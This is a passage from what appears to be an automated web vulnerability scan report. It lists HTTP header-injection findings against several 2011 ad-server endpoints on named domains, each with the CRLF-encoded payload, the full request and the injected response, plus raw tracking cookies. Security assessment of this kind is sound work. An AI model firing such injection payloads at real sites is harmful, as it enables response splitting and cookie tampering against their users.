The value of the va request parameter is copied into the Set-Cookie response header. The payload 83c87%0d%0a30a11bfc5db was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=83c87%0d%0a30a11bfc5db&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:59 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=83c87
30a11bfc5db
; expires=Thu, 16-Jun-11 13:10:00 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:59 GMT;path=/;httponly


2.19. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 2a988%0d%0a9e43732671d was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=2a988%0d%0a9e43732671d&va=0&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:46 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 2a988
9e43732671d
=0; expires=Thu, 16-Jun-11 13:09:47 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:46 GMT;path=/;httponly


2.20. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload afc6d%0d%0a529f13d80d2 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=afc6d%0d%0a529f13d80d2&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:10:12 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=afc6d
529f13d80d2
; expires=Thu, 16-Jun-11 13:10:13 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:20:12 GMT;path=/;httponly


2.21. http://c7.zedo.com/img/bh.gif [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The value of the a request parameter is copied into the Set-Cookie response header. The payload c17e4%0d%0a6a4fbda8351 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /img/bh.gif?n=305&g=20&a=c17e4%0d%0a6a4fbda8351&s=1&t=i HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFgeo=2241452; ZEDOIDX=13; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1; FFCap=1595B305,201787:933,196008,139660:1219,217400,217401|0,13,1:0,30,1:0,30,1:0,30,1:0,30,1; ZFFAbh=879B826,20|1477_897#383Z120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=897B305,20|165_1#365Zc17e4
6a4fbda8351
_1#365;expires=Fri, 15 Jun 2012 11: 29:33 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28998
Expires: Thu, 16 Jun 2011 19:32:51 GMT
Date: Thu, 16 Jun 2011 11:29:33 GMT
Connection: close

GIF89a.............!.......,...........D..;


2.22. http://matcher.bidder7.mookie1.com/google [cver parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload c1f09%0d%0a5b1c06f975e was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=c1f09%0d%0a5b1c06f975e HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QXErgU10I1k; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:08:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'c1f09
5b1c06f975e
'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2.23. http://tacoda.at.atwola.com/rtx/r.gif [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.gif

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 74bfe%0d%0a5a8ec25802e was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESU&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d89674bfe%0d%0a5a8ec25802e; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 17 Jun 2011 10:56:46 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:41:46 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Fri, 24-Jun-11 10:41:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1308307172^1308309106|18201^1308307172^1308309106; path=/; expires=Fri, 17-Jun-11 11:11:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:f09c3ed82a5deedcd5f3f90b36c3d89674bfe
5a8ec25802e
,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;